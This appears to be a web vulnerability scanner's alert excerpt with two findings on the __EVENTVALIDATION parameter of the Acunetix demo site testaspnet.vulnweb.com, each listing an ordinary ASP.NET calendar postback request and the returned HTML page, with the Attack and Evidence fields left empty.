URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8356&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAo6suyNoIZGRkiKv3Lm0iPayadD17h1cZHolTwcM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKtsqeRCgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA7Wuoa7jHOCooA4mRS5VcgqOn%2B5D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:09 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAo6suyNoIZGRkiKv3Lm0iPayadD17h1cZHolTwcM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKtsqeRCgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA7Wuoa7jHOCooA4mRS5VcgqOn+5D" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:White" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8170&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAzdoFNtoIZGRkl66aPv9J9sQj7hKf03sTcdqiiE0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKu%2B6zKBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPzF%2B8sPYqF98SbM4YwGgPdshGS1Q%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:47 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAzdoFNtoIZGRkl66aPv9J9sQj7hKf03sTcdqiiE0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKu+6zKBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPzF+8sPYqF98SbM4YwGgPdshGS1Q=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:White" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged 